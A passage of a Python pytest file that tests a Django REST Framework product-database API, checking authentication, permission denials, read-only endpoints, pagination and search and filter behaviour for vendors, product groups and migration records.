REST_PRODUCT_LIST = reverse("productdb:products-list")
REST_PRODUCT_COUNT = REST_PRODUCT_LIST + "count/"
REST_PRODUCT_DETAIL = REST_PRODUCT_LIST + "%d/"
REST_PRODUCTLIST_LIST = reverse("productdb:productlists-list")
REST_PRODUCTLIST_DETAIL = REST_PRODUCTLIST_LIST + "%d/"
REST_PRODUCTMIGRATIONSOURCE_LIST = reverse("productdb:productmigrationsources-list")
REST_PRODUCTMIGRATIONSOURCE_DETAIL = REST_PRODUCTMIGRATIONSOURCE_LIST + "%d/"
REST_PRODUCTMIGRATIONOPTION_LIST = reverse("productdb:productmigrationoptions-list")
REST_PRODUCTMIGRATIONOPTION_DETAIL = REST_PRODUCTMIGRATIONOPTION_LIST + "%d/"
REST_NOTIFICATIONMESSAGES_LIST = reverse("productdb:notificationmessages-list")
REST_NOTIFICATIONMESSAGES_DETAIL = REST_NOTIFICATIONMESSAGES_LIST + "%d/"
COMMON_API_ENDPOINT_BEHAVIOR = [
REST_VENDOR_LIST,
REST_VENDOR_DETAIL % 1,
REST_PRODUCT_GROUP_LIST,
REST_PRODUCT_GROUP_DETAIL % 1,
REST_PRODUCTLIST_LIST,
REST_PRODUCTLIST_DETAIL % 1,
REST_PRODUCTMIGRATIONSOURCE_LIST,
REST_PRODUCTMIGRATIONSOURCE_DETAIL % 1,
REST_PRODUCTMIGRATIONOPTION_LIST,
REST_PRODUCTMIGRATIONOPTION_DETAIL % 1,
REST_NOTIFICATIONMESSAGES_LIST
]
@pytest.fixture
def common_api_endpoint_objects():
"""DB objects for the common API endpoint tests"""
mixer.blend("productdb.ProductGroup")
mixer.blend("productdb.ProductMigrationSource")
mixer.blend("productdb.ProductMigrationOption")
@pytest.mark.usefixtures("common_api_endpoint_objects")
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestCommonAPIEndpoint:
"""Test Django REST Framework API behavior"""
def test_unauthorized_access(self):
client = APIClient()
for url in COMMON_API_ENDPOINT_BEHAVIOR:
response = client.get(url)
assert response.status_code == status.HTTP_401_UNAUTHORIZED, "Unauthorized access not allowed by default"
assert response["Content-Type"] == "application/json", "Should use JSON by default"
assert response.json() == {"detail": "Authentication credentials were not provided."}
def test_invalid_authentication(self):
client = APIClient()
client.login(username="api", password="invalid password")
for url in COMMON_API_ENDPOINT_BEHAVIOR:
response = client.get(url)
assert response.status_code == status.HTTP_401_UNAUTHORIZED
assert response.json() == {'detail': 'Authentication credentials were not provided.'}
def test_invalid_permissions(self):
client = APIClient()
client.login(**AUTH_USER)
for url in COMMON_API_ENDPOINT_BEHAVIOR:
response = client.post(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert response.json() == {'detail': 'You do not have permission to perform this action.'}
def test_xml_renderer(self):
"""smoke test to verify, that the XML renderer works. Only an XML renderer is implemented therefore write
operations using XML are not possible"""
for e in range(1, 50):
p = mixer.blend("productdb.Product")
test_queries = [
REST_VENDOR_LIST,
REST_PRODUCT_GROUP_LIST,
REST_PRODUCTLIST_LIST,
REST_PRODUCTMIGRATIONSOURCE_LIST,
REST_PRODUCTMIGRATIONOPTION_LIST,
]
client = APIClient()
client.login(**AUTH_USER)
for url in test_queries:
response = client.get(url + "?format=xml")
assert response.status_code == status.HTTP_200_OK
def test_page_size(self):
for e in range(1, 50):
mixer.blend("productdb.Product")
client = APIClient()
client.login(**AUTH_USER)
# default page size is 25
response = client.get(REST_PRODUCT_LIST)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert jdata["pagination"]["page_records"] == 25, "default page size is 25"
assert jdata["pagination"]["total_records"] == 50, "total records should be all products"
# test custom page size
response = client.get(REST_PRODUCT_LIST + "?page_size=40")
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert jdata["pagination"]["page_records"] == 40, "should contain 40 elements"
assert jdata["pagination"]["total_records"] == 50, "total records should be all products"
def test_token_authentication(self):
for e in range(1, 50):
mixer.blend("productdb.Product")
client = APIClient()
client.login(**AUTH_USER)
# get a token by posting the username and password to the API endpoint
response = client.post(REST_TOKEN_AUTH, data=dict(**AUTH_USER))
assert response.status_code == status.HTTP_200_OK
assert "token" in response.json()
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestVendorAPIEndpoint:
"""
Django REST Framework API endpoint tests for the Vendor model
"""
def test_token_authentication(self, live_server):
token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
response = requests.get(live_server + REST_VENDOR_LIST, headers={
"Authorization": "Token %s" % token.key
})
assert response.status_code == status.HTTP_200_OK, response.text
response = requests.get(live_server + REST_VENDOR_LIST, headers={
"Authorization": "Token invalid_token"
})
assert response.status_code == status.HTTP_401_UNAUTHORIZED
def test_read_access_with_authenticated_user(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 3,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 3
},
"data": [
{
"name": "unassigned",
"id": 0,
"url": "http://testserver/productdb/api/v1/vendors/0/"
},
{
"name": "Cisco Systems",
"id": 1,
"url": "http://testserver/productdb/api/v1/vendors/1/"
},
{
"name": "Juniper Networks",
"id": 2,
"url": "http://testserver/productdb/api/v1/vendors/2/"
}
]
}
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_VENDOR_LIST)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not found in result"
assert jdata == expected_result, "unexpected result from API endpoint"
# access first element of the list
response = client.get(jdata["data"][0]["url"])
assert response.status_code == status.HTTP_200_OK
assert jdata["data"][0] == response.json()
def test_add_access_with_permission(self):
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="add_vendor")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.add_vendor")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.post(REST_VENDOR_LIST, data={"name": "Awesome Vendor"})
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
assert response.json() == {'detail': 'Method "POST" not allowed.'}
assert Vendor.objects.count() == 3, "no additional vendor is created"
def test_change_access_with_permission(self):
# create a user with permissions
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="change_vendor")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.change_vendor")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.put(REST_VENDOR_DETAIL % 1, data={"name": "renamed vendor"})
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
assert response.json() == {'detail': 'Method "PUT" not allowed.'}
def test_delete_access_with_permission(self):
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="delete_vendor")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.delete_vendor")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.delete(REST_VENDOR_DETAIL % 1)
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
assert response.json() == {'detail': 'Method "DELETE" not allowed.'}
assert Vendor.objects.count() == 3, "no vendor was deleted"
def test_delete_unassigned_vendor_as_superuser(self):
# not possible due to limitations in the model implementation
client = APIClient()
client.login(**SUPER_USER)
response = client.delete(REST_VENDOR_DETAIL % 0)
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
assert response.json() == {'detail': 'Method "DELETE" not allowed.'}
assert Vendor.objects.count() == 3, "no vendor was deleted"
def test_search_field(self):
"""
search field implementation contains a regular expression search on the vendor name field
:return:
"""
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"name": "Cisco Systems",
"id": 1,
"url": "http://testserver/productdb/api/v1/vendors/1/"
}
]
}
mixer.blend("productdb.Vendor", name="CCCCCCCi")
client = APIClient()
client.login(**AUTH_USER)
# verify the use of regular expressions
response = client.get(REST_VENDOR_LIST + "?search=" + quote("^Ci"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_fields(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"name": "Cisco Systems",
"id": 1,
"url": "http://testserver/productdb/api/v1/vendors/1/"
}
]
}
client = APIClient()
client.login(**AUTH_USER)
# use ID field filter (exact match)
response = client.get(REST_VENDOR_LIST + "?id=1")
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == expected_result, "unexpected result from API endpoint"
# use name field
response = client.get(REST_VENDOR_LIST + "?name=" + quote("Cisco Systems"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == expected_result, "unexpected result from API endpoint"
# call with empty result
response = client.get(REST_VENDOR_LIST + "?name=" + quote("Cisco"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 0, "should return nothing, because an exact match is required"
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestProductMigrationOptionAPIEndpoint:
"""
Django REST Framework API endpoint tests for the ProductMigrationOption model
"""
def test_token_authentication(self, live_server):
token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
response = requests.get(live_server + REST_PRODUCTMIGRATIONOPTION_LIST, headers={
"Authorization": "Token %s" % token.key
})
assert response.status_code == status.HTTP_200_OK, response.text
response = requests.get(live_server + REST_PRODUCTMIGRATIONOPTION_LIST, headers={
"Authorization": "Token invalid_token"
})
assert response.status_code == status.HTTP_401_UNAUTHORIZED
def test_read_access_with_authenticated_user(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 2,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 2
},
"data": [
{
"migration_source": 1,
"migration_product_info_url": None,
"url": "http://testserver/productdb/api/v1/productmigrationoptions/%d/",
"replacement_product_id": "replacement",
"id": 1,
"product": 1,
"comment": "",
},
{
"migration_source": 1,
"migration_product_info_url": None,
"url": "http://testserver/productdb/api/v1/productmigrationoptions/%d/",
"replacement_product_id": "replacement2",
"id": 2,
"product": 2,
"comment": "",
}
]
}
p1 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=1, product_id="B")
p2 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=2, product_id="A")
pmg = mixer.blend("productdb.ProductMigrationSource", name="Cisco", id=1)
pmo1 = mixer.blend("productdb.ProductMigrationOption", product=p1, migration_source=pmg,
replacement_product_id=expected_result["data"][0]["replacement_product_id"], comment="")
pmo2 = mixer.blend("productdb.ProductMigrationOption", product=p2, migration_source=pmg,
replacement_product_id=expected_result["data"][1]["replacement_product_id"], comment="")
expected_result["data"][0]["id"] = pmo1.id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pmo1.id
expected_result["data"][0]["comment"] = pmo1.comment
expected_result["data"][1]["id"] = pmo2.id
expected_result["data"][1]["url"] = expected_result["data"][1]["url"] % pmo2.id
expected_result["data"][1]["comment"] = pmo2.comment
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not found in result"
assert jdata == expected_result, "unexpected result from API endpoint"
# access first element of the list
response = client.get(jdata["data"][0]["url"])
assert response.status_code == status.HTTP_200_OK
assert jdata["data"][0] == response.json()
def test_add_access_with_permission(self):
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="add_productmigrationoption")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.add_productmigrationoption")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.post(REST_PRODUCTMIGRATIONOPTION_LIST,
data={"replacement_id": "Awesome Product Migration Option"})
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
assert response.json() == {'detail': 'Method "POST" not allowed.'}
assert ProductMigrationOption.objects.count() == 0, "no additional product migration option is created"
def test_change_access_with_permission(self):
# create a user with permissions
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="change_productmigrationoption")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.change_productmigrationoption")
mixer.blend("productdb.productmigrationoption")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.put(REST_PRODUCTMIGRATIONOPTION_DETAIL % 1, data={"comment": "renamed product migration source"})
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
assert response.json() == {'detail': 'Method "PUT" not allowed.'}
def test_delete_access_with_permission(self):
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="delete_productmigrationoption")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.delete_productmigrationoption")
mixer.blend("productdb.productmigrationoption")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.delete(REST_PRODUCTMIGRATIONOPTION_DETAIL % 1)
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
assert response.json() == {'detail': 'Method "DELETE" not allowed.'}
assert ProductMigrationOption.objects.count() == 1, "no product migration option was deleted"
def test_search_field(self):
"""
search field contains a regular expression on the product id of the migration option and on the
replacement product id
:return:
"""
expected_result = {
"pagination": {
"page": 1,
"page_records": 2,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 2
},
"data": [
{
"migration_source": 1,
"migration_product_info_url": None,
"url": "http://testserver/productdb/api/v1/productmigrationoptions/%d/",
"replacement_product_id": "replacement",
"id": 1,
"product": 1,
"comment": "",
},
{
"migration_source": 1,
"migration_product_info_url": None,
"url": "http://testserver/productdb/api/v1/productmigrationoptions/%d/",
"replacement_product_id": "replacement2",
"id": 2,
"product": 2,
"comment": "",
}
]
}
p1 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=1, product_id="A1")
p2 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=2, product_id="A2")
p3 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=3, product_id="B1")
pmg = mixer.blend("productdb.ProductMigrationSource", name="Cisco", id=1)
pmo1 = mixer.blend("productdb.ProductMigrationOption", product=p1, migration_source=pmg,
replacement_product_id=expected_result["data"][0]["replacement_product_id"], comment="")
pmo2 = mixer.blend("productdb.ProductMigrationOption", product=p2, migration_source=pmg,
replacement_product_id=expected_result["data"][1]["replacement_product_id"], comment="")
mixer.blend("productdb.ProductMigrationOption", product=p3, migration_source=pmg,
replacement_product_id=expected_result["data"][1]["replacement_product_id"], comment="")
expected_result["data"][0]["id"] = pmo1.id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pmo1.id
expected_result["data"][0]["comment"] = pmo1.comment
expected_result["data"][1]["id"] = pmo2.id
expected_result["data"][1]["url"] = expected_result["data"][1]["url"] % pmo2.id
expected_result["data"][1]["comment"] = pmo2.comment
client = APIClient()
client.login(**AUTH_USER)
# verify the use of regular expressions
response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST + "?search=" + quote("^A"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_fields(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 2,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 2
},
"data": [
{
"migration_source": 1,
"migration_product_info_url": None,
"url": "http://testserver/productdb/api/v1/productmigrationoptions/%d/",
"replacement_product_id": "replacement1",
"id": 1,
"product": 1,
"comment": "",
},
{
"migration_source": 2,
"migration_product_info_url": None,
"url": "http://testserver/productdb/api/v1/productmigrationoptions/%d/",
"replacement_product_id": "replacement2",
"id": 2,
"product": 2,
"comment": "",
}
]
}
p1 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=1, product_id="A1")
p2 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=2, product_id="A2")
p3 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=3, product_id="B1")
pmg = mixer.blend("productdb.ProductMigrationSource", name="Cisco", id=1)
pmg2 = mixer.blend("productdb.ProductMigrationSource", name="Other", id=2)
pmo1 = mixer.blend("productdb.ProductMigrationOption", product=p1, migration_source=pmg,
replacement_product_id=expected_result["data"][0]["replacement_product_id"], comment="")
pmo2 = mixer.blend("productdb.ProductMigrationOption", product=p2, migration_source=pmg2,
replacement_product_id=expected_result["data"][1]["replacement_product_id"], comment="")
mixer.blend("productdb.ProductMigrationOption", product=p3, migration_source=pmg2,
replacement_product_id=expected_result["data"][1]["replacement_product_id"], comment="")
expected_result["data"][0]["id"] = pmo1.id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pmo1.id
expected_result["data"][0]["comment"] = pmo1.comment
expected_result["data"][1]["id"] = pmo2.id
expected_result["data"][1]["url"] = expected_result["data"][1]["url"] % pmo2.id
expected_result["data"][1]["comment"] = pmo2.comment
client = APIClient()
client.login(**AUTH_USER)
# use ID field filter (exact match)
response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST + "?id=%s" % pmo1.id)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
mod_res = expected_result
mod_res["pagination"] = {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
}
del mod_res["data"][1]
assert jdata == expected_result, "unexpected result from API endpoint"
# use replacement_product_id field filter (startswith match)
response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST + "?replacement_product_id=" + quote("replacement1"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == mod_res, "unexpected result from API endpoint"
# use product field filter (startswith match)
response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST + "?product=" + quote("A1"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == mod_res, "unexpected result from API endpoint"
# use migration_source field filter (startswith match)
response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST + "?migration_source=" + quote("Cisco"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == mod_res, "unexpected result from API endpoint"
# call with empty result
response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST + "?replacement_product_id=" + quote("invalid"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 0, "should return nothing, because an exact match is required"
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestProductMigrationSourceAPIEndpoint:
"""
Django REST Framework API endpoint tests for the ProductMigrationSource model
"""
def test_token_authentication(self, live_server):
token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
response = requests.get(live_server + REST_PRODUCTMIGRATIONSOURCE_LIST, headers={
"Authorization": "Token %s" % token.key
})
assert response.status_code == status.HTTP_200_OK, response.text
response = requests.get(live_server + REST_PRODUCTMIGRATIONSOURCE_LIST, headers={
"Authorization": "Token invalid_token"
})
assert response.status_code == status.HTTP_401_UNAUTHORIZED
def test_read_access_with_authenticated_user(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 2,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 2
},
"data": [
{
"id": 1,
"preference": 50,
"url": "http://testserver/productdb/api/v1/productmigrationsources/1/",
"description": "My description",
"name": "Cisco",
},
{
"id": 2,
"preference": 50,
"url": "http://testserver/productdb/api/v1/productmigrationsources/2/",
"description": "My other description",
"name": "other",
}
]
}
[mixer.blend("productdb.ProductMigrationSource", **expected_result["data"][i])
for i in range(0, len(expected_result["data"]))]
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_PRODUCTMIGRATIONSOURCE_LIST)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not found in result"
assert jdata == expected_result, "unexpected result from API endpoint"
# access first element of the list
response = client.get(jdata["data"][0]["url"])
assert response.status_code == status.HTTP_200_OK
assert jdata["data"][0] == response.json()
def test_add_access_with_permission(self):
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="add_productmigrationsource")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.add_productmigrationsource")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.post(REST_PRODUCTMIGRATIONSOURCE_LIST, data={"name": "Awesome Product Migration Source"})
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
assert response.json() == {'detail': 'Method "POST" not allowed.'}
assert ProductMigrationSource.objects.count() == 0, "no additional vendor is created"
def test_change_access_with_permission(self):
# create a user with permissions
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="change_productmigrationsource")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.change_productmigrationsource")
mixer.blend("productdb.productmigrationsource")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.put(REST_PRODUCTMIGRATIONSOURCE_DETAIL % 1, data={"name": "renamed product migration source"})
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
assert response.json() == {'detail': 'Method "PUT" not allowed.'}
def test_delete_access_with_permission(self):
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="delete_productmigrationsource")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.delete_productmigrationsource")
mixer.blend("productdb.productmigrationsource")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.delete(REST_PRODUCTMIGRATIONSOURCE_DETAIL % 1)
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
assert response.json() == {'detail': 'Method "DELETE" not allowed.'}
assert ProductMigrationSource.objects.count() == 1, "no product migration source was deleted"
def test_search_field(self):
"""
search field implementation contains a regular expression search on the vendor name field
:return:
"""
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"name": "Cisco Systems",
"url": "http://testserver/productdb/api/v1/productmigrationsources/%d/",
"id": 1,
"preference": 50,
"description": None,
}
]
}
pmg = mixer.blend("productdb.productmigrationsource", name="Cisco Systems")
expected_result["data"][0]["id"] = pmg.id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pmg.id
mixer.blend("productdb.productmigrationsource", name="Other PMG")
client = APIClient()
client.login(**AUTH_USER)
# verify the use of regular expressions
response = client.get(REST_PRODUCTMIGRATIONSOURCE_LIST + "?search=" + quote("^Ci"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_fields(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"description": None,
"id": 1,
"name": "Cisco Systems",
"preference": 50,
"url": "http://testserver/productdb/api/v1/productmigrationsources/%d/"
}
]
}
pmg = mixer.blend("productdb.productmigrationsource", name="Cisco Systems")
expected_result["data"][0]["id"] = pmg.id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pmg.id
mixer.blend("productdb.productmigrationsource", name="Other PMG")
client = APIClient()
client.login(**AUTH_USER)
# use ID field filter (exact match)
response = client.get(REST_PRODUCTMIGRATIONSOURCE_LIST + "?id=%s" % pmg.id)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == expected_result, "unexpected result from API endpoint"
# use name field filter (exact match)
response = client.get(REST_PRODUCTMIGRATIONSOURCE_LIST + "?name=" + quote("Cisco Systems"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == expected_result, "unexpected result from API endpoint"
# call with empty result
response = client.get(REST_PRODUCTMIGRATIONSOURCE_LIST + "?name=" + quote("Cisco"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 0, "should return nothing, because an exact match is required"
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestProductGroupAPIEndpoint:
"""Django REST Framework API endpoint tests for the Product Group model"""
def test_token_authentication(self, live_server):
token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
response = requests.get(live_server + REST_PRODUCT_GROUP_LIST, headers={
"Authorization": "Token %s" % token.key
})
assert response.status_code == status.HTTP_200_OK, response.text
response = requests.get(live_server + REST_PRODUCT_GROUP_LIST, headers={
"Authorization": "Token invalid_token"
})
assert response.status_code == status.HTTP_401_UNAUTHORIZED
def test_read_access_with_authenticated_user(self):
expected_result = {
"data": [
{
"url": "http://testserver/productdb/api/v1/productgroups/1/",
"name": "product group 1",
"id": 1,
"vendor": 0
},
{
"url": "http://testserver/productdb/api/v1/productgroups/2/",
"name": "product group 2",
"id": 2,
"vendor": 0
},
{
"url": "http://testserver/productdb/api/v1/productgroups/3/",
"name": "product group 3",
"id": 3,
"vendor": 0
}
],
"pagination": {
"page_records": 3,
"last_page": 1,
"url": {
"next": None,
"previous": None
},
"page": 1,
"total_records": 3
}
}
mixer.blend("productdb.ProductGroup", name="product group 1")
mixer.blend("productdb.ProductGroup", name="product group 2")
mixer.blend("productdb.ProductGroup", name="product group 3")
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_PRODUCT_GROUP_LIST)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not found in result"
# adjust ID values from Database
for c in range(0, 3):
expected_result["data"][c]["id"] = ProductGroup.objects.get(name="product group %d" % (c+1)).id
expected_result["data"][c]["url"] = "http://testserver/productdb/api/v1/productgroups/%d/" % expected_result["data"][c]["id"]
assert jdata == expected_result, "unexpected result from API endpoint"
# access first element of the list
response = client.get(jdata["data"][0]["url"])
assert response.status_code == status.HTTP_200_OK
assert jdata["data"][0] == response.json()
def test_add_access_with_permission(self):
test_user = "user"
test_product_group_name = "Test Product Group"
expected_result = {
"vendor": 1,
"name": test_product_group_name,
"url": "http://testserver/productdb/api/v1/productgroups/1/",
"id": 1
}
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="add_productgroup")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.add_productgroup")
client = APIClient()
client.login(username=test_user, password=test_user)
# create with name
response = client.post(REST_PRODUCT_GROUP_LIST, data={"name": test_product_group_name})
assert response.status_code == status.HTTP_400_BAD_REQUEST
assert response.json() == {'vendor': ['This field is required.']}
# create with name name and Vendor ID
response = client.post(REST_PRODUCT_GROUP_LIST, data={"name": test_product_group_name, "vendor": 1})
assert response.status_code == status.HTTP_201_CREATED
# adjust ID values from Database
expected_result["id"] = ProductGroup.objects.get(name=test_product_group_name).id
expected_result["url"] = "http://testserver/productdb/api/v1/productgroups/%d/" % expected_result["id"]
assert response.json() == expected_result, "Should provide the new product group"
def test_change_access_with_permission(self):
test_product_group = "renamed product group"
pg = mixer.blend("productdb.ProductGroup", name="product group")
expected_result = {
"url": "http://testserver/productdb/api/v1/productgroups/%d/",
"vendor": 0,
"name": test_product_group,
"id": 0
}
# create a user with permissions
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="change_productgroup")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.change_productgroup")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.put(REST_PRODUCT_GROUP_DETAIL % pg.id, data={"name": test_product_group})
assert response.status_code == status.HTTP_200_OK
# adjust pk value
expected_result["id"] = ProductGroup.objects.get(name=test_product_group).id
expected_result["url"] = expected_result["url"] % expected_result["id"]
assert response.json() == expected_result
def test_delete_access_with_permission(self):
pg = mixer.blend("productdb.ProductGroup")
assert ProductGroup.objects.count() == 1
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="delete_productgroup")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.delete_productgroup")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.delete(REST_PRODUCT_GROUP_DETAIL % pg.id)
assert response.status_code == status.HTTP_204_NO_CONTENT
assert ProductGroup.objects.count() == 0
def test_count_endpoint(self):
